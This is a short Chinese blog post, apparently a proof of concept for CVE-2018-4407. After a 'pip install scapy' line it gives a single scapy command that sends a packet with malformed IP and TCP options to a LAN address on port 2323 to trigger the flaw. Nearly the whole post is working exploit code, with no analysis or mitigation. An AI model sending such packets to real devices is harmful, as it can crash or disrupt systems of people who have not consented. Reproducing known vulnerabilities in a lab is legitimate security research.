CVE-2018-4407 漏洞复现POC

pip install scapy

  

import scapy
from scapy.all import *

send(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))

  

posted @ 2018-11-01 14:26  渐渐遗忘者  阅读(2391)  评论(0编辑  收藏  举报